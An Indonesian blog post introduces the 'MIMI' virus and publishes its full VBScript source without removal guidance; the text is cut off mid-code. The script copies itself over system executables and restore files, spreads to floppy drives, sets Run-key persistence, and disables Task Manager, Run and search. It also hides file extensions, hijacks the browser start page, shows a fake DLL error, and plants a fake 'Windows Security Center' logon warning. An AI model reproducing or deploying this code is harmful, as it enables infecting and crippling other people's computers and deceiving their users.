Virus MIMI

Namanya mirip nama temen kuliah saya.. yang buat virusnya juga orang padang lagi...ondeh mandeh,,,urang awak lah banyak kemajuan ruponyo yo..waakkakaka..
Nih virus udah lama juga c menyebar di dunia per-komputer-an (alaaah...) kalo ga salah pake PCMAV udah bisa ngapus nih virus, tapi tmen saya bilang ga bisa tuh...
Sebenarnya pengen bikin cara hapus manual nih virus, tapi berhubung ga sempat/..(lagi banyak kegiatan kampus neh...) maka saya cuma bisa memposting source codenya aja yah,..silahkan cari sendiri cara ngapus manualnya...heheh..

——————————–[mulai]———————–

Set love = createobject(StrReverse(”tcejbOmetsySelif.gnitpircS”))
Set dear = createobject(StrReverse(”llehS.tpircSW”))

qi = “c:\regedit.vbs”


syau = “c:\mymimi.vbs”


heiji = “c:\notepad.vbs”


forest = “c:\antivirus.vbs”


han = “c:\windows\svchost.exe”


tachoor = “c:\windows\EXPL0RER.vbs”



mimi = “c:\windows\system\WinUpdt.vbs”


on error resume next


love.CopyFile wscript.scriptfullname, tachoor


on error resume next


love.CopyFile wscript.scriptfullname, mimi


on error resume next


iqra = dear.regread(”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32″)



If iqra <> “c:\windows\svchost.exe ” & tachoor then


on error resume next


dear.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptingHost\Settings\Timeout”, 0, “REG_DWORD”


dear.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32″, “c:\windows\svchost.exe ” & tachoor



dear.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVGuard32″, “c:\windows\svchost.exe ” & mimi


dear.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCMAVscanner”, “c:\windows\svchost.exe ” & syau


done = MsgBox(”The application or DLL C:\WINDOWS\system32\MSVBVM60.DLL is not a valid Windows image. Please check this againts your installation diskette.”, 16, “msvbvm60.dll - Bad Image”)



dear.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\SVCH0ST”, “c:\windows\svchost.exe ” & mimi


love.CopyFile wscript.scriptfullname, “A:\diary_rahmi.vbe”


on error resume next


love.CopyFile wscript.scriptfullname, tachoor


on error resume next



love.CopyFile wscript.scriptfullname, “C:\WINDOWS\msvbvm60.dll”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm60.dll”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm50.dll”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msihnd.dll”



on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvnvvm60.dll”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\TASKMAN.exe”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\NOTEPAD.exe”


on error resume next



love.CopyFile wscript.scriptfullname, “C:\WINDOWS\R.com”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\REGEDIT.com”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\regedit.exe”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\nusrmgr.cpl”



on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\cmd.exe”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\control.exe”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msiexec.exe”


on error resume next



love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\regedt32.exe”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\taskman.exe”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\taskmgr.exe”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\command.com”



on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\T.com”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\TASKMGR.com”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\Restore\rstrui.exe”


on error resume next



love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\Restore\srdiag.exe”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\Restore\srframe.mmf”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\Restore\rstrlog.dat”


on error resume next


cdrsqnx()



dwozmc()


ontrus()


else


on error resume next


love.CopyFile wscript.scriptfullname, “A:\diary_mimi.vbs”


on error resume next


love.CopyFile wscript.scriptfullname, tachoor


on error resume next



love.CopyFile wscript.scriptfullname, “C:\Documents and Settings\All Users\Start Menu\Programs\Startup\PCMAVExtMonitor.vbs”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm60.dll”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm50.dll”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\msvbvm60.dll”



on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvm60.dll”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\msvbvnvvm60.dll”


on error resume next


love.CopyFile wscript.scriptfullname, “C:\WINDOWS\system32\nusrmgr.cpl”


on error resume next



hcdmshsx()


cdrsqnx()


dwozmc()


ontrus()


End if


Sub hcdmshsx()


Dim married


on error resume next


married = “<html><head><title>bandit corporation</title><b><center><h1><font color=” & chr(34) & “#FF0000″ & chr(34) & ” size=” & chr(34) & “10″ & chr(34) & ” face=Verdana><br>my_mimi </font><font size=” & chr(34) & “8″ & chr(34) & ” color=” & chr(34) & “#FF2244″ & chr(34) & “>♥ </font><hr align=center width=” & chr(34) & “40%” & chr(34) & ” size=” & chr(34) & “2″ & chr(34) & “></font></h1></head>” & “<body bgcolor=” & chr(34) & “#000000″ & chr(34) & “><body><b><center><font color=” & chr(34) & “#FF0000″ & chr(34) & ” size=” & chr(34) & “4″ & chr(34) & ” face=verdana></p><p><p><b><p><b><p><br><p>muka bego!! ngapain mandangin kompie ini trus2an!? cari dong anti virusnya!!<br><br><br><a href=” & chr(34) & “http://friendster.com/sywq” & chr(34) & “>klik di sini!</a></font></p><p></p><p></p><p></p><p><center><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><hr align=center width=” & chr(34) & “100%” & chr(34) & ” size=” & chr(34) & “4″ & chr(34) & “><marquee><font color=” & chr(34) & “#00FF00″ & chr(34) & ” size=” & chr(34) & “4″ & chr(34) & ” face=Verdana></font><font size=” & chr(34) & “4″ & chr(34) & ” color=” & chr(34) & “#FF0000″ & chr(34) & “>♣ ♠ ♦ ♥ </font><font color=” & chr(34) & “#FFFFFF” & chr(34) & ” size=” & chr(34) & “4″ & chr(34) & “face=Verdana> Pada komputer ini bersarang virus my_mimi</font><font size=” & chr(34) & “4″ & chr(34) & ” color=” & chr(34) & “#FF0000″ & chr(34) & “> ♣ ♠ ♦ ♥ </font><font color=” & chr(34) & “#FFFFFF” & chr(34) & ” size=” & chr(34) & “4″ & chr(34) & “face=Verdana> Komputer iko kanai virus my_mimi</font><font size=” & chr(34) & “4″ & chr(34) & ” color=” & chr(34) & “#FF0000″ & chr(34) & “> ♣ ♠ ♦ ♥ </font><font color=” & chr(34) & “#FFFFFF” & chr(34) & ” size=” & chr(34) & “4″ & chr(34) & “face=Verdana> This computer is a victim of virus my_mimi</font><font size=” & chr(34) & “4″ & chr(34) & ” color=” & chr(34) & “#FF0000″ & chr(34) & “> ♣ ♠ ♦ ♥ </font><font color=” & chr(34) & “#00FF00″ & chr(34) & ” size=” & chr(34) & “4″ & chr(34) & ” face=Verdana>with love, mr.han</font></marquee><hr align=center width=” & chr(34) & “100%” & chr(34) & ” size=” & chr(34) & “4″ & chr(34) & “></center></html>”



Set hateness = love.createtextfile(”C:\windows\my_mimi.html”,1)


hateness.Write married


Set hateness = love.createtextfile(”C:\Documents and Settings\All Users\Desktop\mimi on internet.html”,1)


hateness.Write married


hateness.Close


on error resume next


Set broken = love.createtextfile(”C:\Documents and Settings\All Users\Start Menu\Programs\Startup\sywq.ini”, 1)



broken.WriteLine “::::::,…..:;.,,,,,..,…,,,::,,,,:::::::::;:;;;;;;;rrrrrr;;;;;;r@@@AS2AMHG3hrsy@” & vbCrlf & “:,….,,…..;,,.. … ..:,,:::::::::::;;;;;;;;rrrrsr;;;;;;;:s@@@92322@@@;wQ@” & vbCrlf & “..,,,,,,,,,..,, .;r3HAH@@@G5:….,:::::::;;;s;;;;;;rrrrrssrr;;;r;;,X@X5XXXHMB@3201″ & vbCrlf & “,,,,,,,,,,,. .i&@@@@@@@@@@@@@@9Sr,.;::::;;;:s;;;;;rrrr;;:;;;;;:;;;::G22X3H@2sAMB3,” & vbCrlf & “,,,,,,,,,,. r@@@@@@@@@@@@###@@@@@#Sr;::;;;;:rr;rrs;;::::::,,:rGB2r:,r23&B@M2r#@@@h” & vbCrlf & “,,,,,,,,,..&@@@@@@@@@@#AX5525S5h@@@5::;;;;;;rr;;;:::::,,.:sG@@@@@@HSs2XA##A9rB@@@B” & vbCrlf & “,,,,,,,,.:@@@@@###AAA95iSS522XB@M5SA;:;rrr;;;::::,,,..:iA@@@@@@@@@@@ASX3HHA&r3&G&H” & vbCrlf & “,,,,,,,.:@@@@@##Mh225XGM##H&GSX##AS5s:;rr;:::,,,…:5M@@@@@@####@@@@@323AAHAr2HA&&” & vbCrlf & “,,,,,,,.A@@@####B35XH#####MA92i2#@@Br,..,::::,.,;X#@@@@@##MMMMMM####@@AhhhBAsX#BBA” & vbCrlf & “,,,,,,.5@@##M##@#92&AhhH#@#A922sr5srSs;…,,:;H@@@@@@#MBBBBBMMMBHHB##3s2AGMHi5&HMA” & vbCrlf & “,,,,,,;@@#MBM##@@XiX9B#@@BA9X253HBB@#2s;…..,rh@@@@##MMMMMMBBHHAA2: rHMHi2GXGA” & vbCrlf & “;,,,,.s@@#MM###@#5s2AAX5552XhGX@@@BAXSir;…. ;h@@@###MBBHH&hS, A#B59B3X3″ & vbCrlf & “;:,:, s@@MB#####hsiSissiS2223&AAh3X&&X93S; … ,2#@#MBBHG3Xii.,, H@B2G#A&h” & vbCrlf & “:;::,..M@MBB##@HSrsssiS222XX32222&####MH&X…… .iB@#h2Sii53X:r: M@BX&#HAG” & vbCrlf & “::;::, ;@#MMM#@#2rsSiS222XXX3X9A#@HAHM@#G&; .,,…. rGA35522X&X:r: ##B&HBBH&” & vbCrlf & “::;;:,. S@#MM#@@H5iSSS522XX339&MMGhB##@@M&;,:..,,…. ;hMAX52XAX:r; ##B&HAHBA” & vbCrlf & “:::;:::. 2B93AMMH&255SS2XX3939G&G&BMBH&hX2,.;;:……… :XMHX2XA9;;,,##BHMHAMA” & vbCrlf & “:;;;;::. s#5XGHX2iS55552X9hhG&ABBHA&&ABBB; .,:;,…,,,… .iBM&XGAr,r##BMAsHMH” & vbCrlf & “rr;::,,,. XAA#AGGSsS222X39G&&AAA&hh&B##@@: …,:;,..,,,,,… rA#H&X,;##B#& rMA” & vbCrlf & “::,,,,,,,. ,shA5235sS22X3h&AAAAA&&HM#@@@9 …..,:;,..,,,,.,. :9##Xi##B#@r.2G” & vbCrlf & “:::,,,,,,.. :X@@3rri2X339G&AHM##@@@@@#Xr …..,,::,..,,….. ,5MAM#M#@@@@&” & vbCrlf & “:,,,,,,,,… ;B@M2s29GAAHM#@@@@@@###MHHi …….,::,……… r##M@@#@@@” & vbCrlf & “,,,,,,,,…… ,iSS9&AAAAAHHHHHA&GGGAAMs ..::, …… .:3MMB#@#BHM” & vbCrlf & “,,,,,,………. ,29999939h&AA&&AB#@@@@3:,.. .,. .. ,@@@#BB#@@AAH” & vbCrlf & “,,,,,,,…,……. s23GAB##########@@@@@@@@@@@@BhSr:,,. ,M@@@@@@#B#@@HGA” & vbCrlf & “,,,,,,,,,.,,.. ,:;&##@@###MMMM#MMBBM###@@@@@@@@@@@@@@@@H2H@@@@@@@@@@#@@#GA” & vbCrlf & “,,,,,,,,,,. ,;rsiSh#@@@@@@#####MMM#######MBHAH#@#BMMB25hBM#@@@@@@@@#@@@@@@@@@@AA” & vbCrlf & “,,,,,,,.. :X@@@@@@@@@@@@@@####MMMM#######MMMMB&M@@@###HX3XX995hHAAA&&#@@@@@@@@@MA” & vbCrlf & “,,,,,,,. ;B@@@@@@@@@@@##M##########MH&923&BHH#@HHM#@@@MB##952A3X&Hi2hB#@@@@#@@@@@B” & vbCrlf & “,,,,,,,.9@@@@#@@##@@@@#MM########@@MB##MBM#@@@@@#h2SA#@#H;sX33&hXAX392&AM#A2B@@@@@” & vbCrlf & “,,,,,,.2@@BM#MM#@##@@@@#B#@@@@@@@@@@@@@@@@@@@@@@@##@#@@@@ASG9h&Xh9hSA23X32S3&#@@@@” & vbCrlf & “,,,,,.:@@AB##M####@@@@@@#M#@@@@@#@@@@@@@@@@@@@@@@@#@@@@@@@@@2i5iX5s2G355X2GG2iG@@#” & vbCrlf & “,,,,,.&@BMBBM#M#@#@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@B#MA9G#M##MBA#MX2#@” & vbCrlf & “::,,.;@#M#HH###M#@@@@@@@@@##@@@##@@#@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@BM@” & vbCrlf & “…. ;BHHBHHMM##M##@@@@@@@@######@@@@@@@@@############@@@@@@@@@###################” & vbCrlf & “” & vbCrlf & “mimi…” & vbCrlf & “lo emang my_mimi!!” & vbCrlf & “” & vbCrlf & “however you are,,” & vbCrlf & “IjustWANNAbeWITHu..” & vbCrlf & ” ” & vbCrlf & “[credits]” & vbCrlf & ” ” & vbCrlf & “mr.han (d_janer’z crew!)” & vbCrlf & “haecal (d_janer’z crew!)” & vbCrlf & “rendi (d_janer’z crew!)” & vbCrlf & “siwa (d_janer’z crew!)”& vbCrlf & “kharisma (phatigokil)” & vbCrlf & “all d_janer’z crew!!! smansa padang”



Set broken = love.createtextfile(”C:\Documents and Settings\All Users\Desktop\my beLoved mimi.ini”, 1)


broken.WriteLine “::::::,…..:;.,,,,,..,…,,,::,,,,:::::::::;:;;;;;;;rrrrrr;;;;;;r@@@AS2AMHG3hrsy@” & vbCrlf & “:,….,,…..;,,.. … ..:,,:::::::::::;;;;;;;;rrrrsr;;;;;;;:s@@@92322@@@;wQ@” & vbCrlf & “..,,,,,,,,,..,, .;r3HAH@@@G5:….,:::::::;;;s;;;;;;rrrrrssrr;;;r;;,X@X5XXXHMB@3201″ & vbCrlf & “,,,,,,,,,,,. .i&@@@@@@@@@@@@@@9Sr,.;::::;;;:s;;;;;rrrr;;:;;;;;:;;;::G22X3H@2sAMB3,” & vbCrlf & “,,,,,,,,,,. r@@@@@@@@@@@@###@@@@@#Sr;::;;;;:rr;rrs;;::::::,,:rGB2r:,r23&B@M2r#@@@h” & vbCrlf & “,,,,,,,,,..&@@@@@@@@@@#AX5525S5h@@@5::;;;;;;rr;;;:::::,,.:sG@@@@@@HSs2XA##A9rB@@@B” & vbCrlf & “,,,,,,,,.:@@@@@###AAA95iSS522XB@M5SA;:;rrr;;;::::,,,..:iA@@@@@@@@@@@ASX3HHA&r3&G&H” & vbCrlf & “,,,,,,,.:@@@@@##Mh225XGM##H&GSX##AS5s:;rr;:::,,,…:5M@@@@@@####@@@@@323AAHAr2HA&&” & vbCrlf & “,,,,,,,.A@@@####B35XH#####MA92i2#@@Br,..,::::,.,;X#@@@@@##MMMMMM####@@AhhhBAsX#BBA” & vbCrlf & “,,,,,,.5@@##M##@#92&AhhH#@#A922sr5srSs;…,,:;H@@@@@@#MBBBBBMMMBHHB##3s2AGMHi5&HMA” & vbCrlf & “,,,,,,;@@#MBM##@@XiX9B#@@BA9X253HBB@#2s;…..,rh@@@@##MMMMMMBBHHAA2: rHMHi2GXGA” & vbCrlf & “;,,,,.s@@#MM###@#5s2AAX5552XhGX@@@BAXSir;…. ;h@@@###MBBHH&hS, A#B59B3X3″ & vbCrlf & “;:,:, s@@MB#####hsiSissiS2223&AAh3X&&X93S; … ,2#@#MBBHG3Xii.,, H@B2G#A&h” & vbCrlf & “:;::,..M@MBB##@HSrsssiS222XX32222&####MH&X…… .iB@#h2Sii53X:r: M@BX&#HAG” & vbCrlf & “::;::, ;@#MMM#@#2rsSiS222XXX3X9A#@HAHM@#G&; .,,…. rGA35522X&X:r: ##B&HBBH&” & vbCrlf & “::;;:,. S@#MM#@@H5iSSS522XX339&MMGhB##@@M&;,:..,,…. ;hMAX52XAX:r; ##B&HAHBA” & vbCrlf & “:::;:::. 2B93AMMH&255SS2XX3939G&G&BMBH&hX2,.;;:……… :XMHX2XA9;;,,##BHMHAMA” & vbCrlf & “:;;;;::. s#5XGHX2iS55552X9hhG&ABBHA&&ABBB; .,:;,…,,,… .iBM&XGAr,r##BMAsHMH” & vbCrlf & “rr;::,,,. XAA#AGGSsS222X39G&&AAA&hh&B##@@: …,:;,..,,,,,… rA#H&X,;##B#& rMA” & vbCrlf & “::,,,,,,,. ,shA5235sS22X3h&AAAAA&&HM#@@@9 …..,:;,..,,,,.,. :9##Xi##B#@r.2G” & vbCrlf & “:::,,,,,,.. :X@@3rri2X339G&AHM##@@@@@#Xr …..,,::,..,,….. ,5MAM#M#@@@@&” & vbCrlf & “:,,,,,,,,… ;B@M2s29GAAHM#@@@@@@###MHHi …….,::,……… r##M@@#@@@” & vbCrlf & “,,,,,,,,…… ,iSS9&AAAAAHHHHHA&GGGAAMs ..::, …… .:3MMB#@#BHM” & vbCrlf & “,,,,,,………. ,29999939h&AA&&AB#@@@@3:,.. .,. .. ,@@@#BB#@@AAH” & vbCrlf & “,,,,,,,…,……. s23GAB##########@@@@@@@@@@@@BhSr:,,. ,M@@@@@@#B#@@HGA” & vbCrlf & “,,,,,,,,,.,,.. ,:;&##@@###MMMM#MMBBM###@@@@@@@@@@@@@@@@H2H@@@@@@@@@@#@@#GA” & vbCrlf & “,,,,,,,,,,. ,;rsiSh#@@@@@@#####MMM#######MBHAH#@#BMMB25hBM#@@@@@@@@#@@@@@@@@@@AA” & vbCrlf & “,,,,,,,.. :X@@@@@@@@@@@@@@####MMMM#######MMMMB&M@@@###HX3XX995hHAAA&&#@@@@@@@@@MA” & vbCrlf & “,,,,,,,. ;B@@@@@@@@@@@##M##########MH&923&BHH#@HHM#@@@MB##952A3X&Hi2hB#@@@@#@@@@@B” & vbCrlf & “,,,,,,,.9@@@@#@@##@@@@#MM########@@MB##MBM#@@@@@#h2SA#@#H;sX33&hXAX392&AM#A2B@@@@@” & vbCrlf & “,,,,,,.2@@BM#MM#@##@@@@#B#@@@@@@@@@@@@@@@@@@@@@@@##@#@@@@ASG9h&Xh9hSA23X32S3&#@@@@” & vbCrlf & “,,,,,.:@@AB##M####@@@@@@#M#@@@@@#@@@@@@@@@@@@@@@@@#@@@@@@@@@2i5iX5s2G355X2GG2iG@@#” & vbCrlf & “,,,,,.&@BMBBM#M#@#@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@B#MA9G#M##MBA#MX2#@” & vbCrlf & “::,,.;@#M#HH###M#@@@@@@@@@##@@@##@@#@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@BM@” & vbCrlf & “…. ;BHHBHHMM##M##@@@@@@@@######@@@@@@@@@############@@@@@@@@@###################” & vbCrlf & “” & vbCrlf & “mimi…” & vbCrlf & “lo emang my_mimi!!” & vbCrlf & “” & vbCrlf & “however you are,,” & vbCrlf & “IjustWANNAbeWITHu..” & vbCrlf & ” ” & vbCrlf & “[credits]” & vbCrlf & ” ” & vbCrlf & “mr.han (d_janer’z crew!)” & vbCrlf & “haecal (d_janer’z crew!)” & vbCrlf & “rendi (d_janer’z crew!)” & vbCrlf & “siwa (d_janer’z crew!)” & vbCrlf & “kharisma (phatigokil)” & vbCrlf & “all d_janer’z crew!!! smansa padang”



Set broken = love.createtextfile(qi, 1)


broken.WriteLine “MsgBox ” & chr(34) & “Knp sih kamu buka regedit? Dah bosan ya jadi temen aku? Kamu tega banget!” & chr(34) & “, vbOKonly,” & chr(34) & “my_mimi : (” & chr(34)



Set broken = love.createtextfile(heiji, 1)


broken.WriteLine “MsgBox ” & chr(34) & “Kamu nyari notepad ya? Dia lagi pergi ma wordpad. Ada pesan?” & chr(34) & “, vbOKonly,” & chr(34) & “my_mimi : P” & chr(34)



Set broken = love.createtextfile(forest, 1)


broken.WriteLine “MsgBox ” & chr(34) & “Ngapain kamu make antivirus? Kamu pikir aku ini virus yg ngerusak kamu? Klo gitu biar aku cari teman lain aja!” & chr(34) & “, vbOKonly,” & chr(34) & “my_mimi : (” & chr(34)



Set broken = love.createtextfile(syau, 1)


broken.WriteLine “MsgBox ” & chr(34) & “hy, seneng deyh ketemuwh kamu lagi!” & chr(34) & “, vbOKonly,” & chr(34) & “my_mimi ^_~” & chr(34)



broken.Close


End sub


Sub cdrsqnx()


On Error resume next


Set dear = createobject(StrReverse(”llehS.tpircSW”))


with dear


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext”, “Windows Security Center has been detected a new kind virus on your machine {codename: my_mimi}. This virus can causes your machine MELEDAK GITU LOH! Please tell Microsoft about this or use Microsoft Windows Automatic Update. For further information, contact us at : customercare@microsoft.com



.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption”, “Windows Security Center Alert”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Start Page”, “C:\windows\my_mimi.html”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Logon User Name”, “mimi”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName”, “mimi”



.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName”, “mimi”


.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\ConvertedWallpaper”, “C:\windowsmy_mimi.html”


.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive”, “1″


.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE”, “C:\WINDOWS\system32\marquee.scr”



.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Attributes”, “00011″


.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\BackgroundColor”, “0 0 0″


.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\CharSet”, “0″


.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Font”, “Verdana”



.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Mode”, “1″


.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Size”, “24″


.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Speed”, “3″


.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Text”, “my_mimi by mr. han (d_janer’z crew!)”



.RegWrite “HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\TextColor”, “255 0 0″


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHidden”, 0, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchSystemDirs”, 0, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ThumbnailSize”, 100, “REG_DWORD”



.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden”, 1, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoFolderOptions”, 0, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 1, “REG_DWORD”



.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 0, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1, “REG_DWORD”



.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled”, 1, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, 1, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1, “REG_DWORD”



.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHidden”, 0, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchSystemDirs”, 0, “REG_DWORD”



.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ThumbnailSize”, 100, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoFolderOptions”, 0, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 0, “REG_DWORD”



.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, 1, “REG_DWORD”



.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ControlPanelInMyComputer\CheckedValue”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ControlPanelInMyComputer\UncheckedValue”, 1, “REG_DWORD”



.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ControlPanelInMyComputer\DefaultValue”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\CheckedValue”, 0, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\UncheckedValue”, 0, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\DefaultValue”, 0, “REG_DWORD”



.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\WarningIfNotDefault”, “Ngapain sih main buka-bukaan? Ntar aku bilang mama kamu lho!”


.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\CheckedValue”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\UncheckedValue”, 1, “REG_DWORD”


